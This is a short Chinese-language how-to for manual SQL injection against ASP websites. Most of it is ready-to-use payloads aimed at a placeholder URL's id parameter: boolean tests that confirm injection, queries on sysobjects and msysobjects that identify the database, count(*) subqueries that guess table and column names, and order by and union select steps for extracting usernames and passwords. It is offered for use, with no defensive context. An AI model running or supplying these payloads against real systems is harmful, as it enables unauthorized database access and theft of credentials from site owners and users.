判断是否存在注入

http://URL.asp?id=24 and 1=1 返回了正常

http://URL.asp?id=24 and 1=2 返回了错误

注入存在

判断数据库是ACC或MSS:ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,MSS的系统表是sysobjects,在WEB环境下有访问权限。

http://URL.asp?id=24 and (select count(*) from sysobjects)>0

http://URL.asp?id=24 and (select count(*) from msysobjects)>0

若数据库是MSS，则第一条，网页，一定运行正常，第二条则异常；若是ACCESS则两条都会异常。

判断表名

http://URL.asp?id=24 and (select count(*) from 表名)>0

如果表名存在就会返回正常，反则错误。

判断列名：

and (select count(列名) from 已存在表名)>0

判断网站的回显位置：

order by N

union select 1,2,3…N from 已存在表名

猜用户名和密码长度；

根据回显位置替换列名就可以了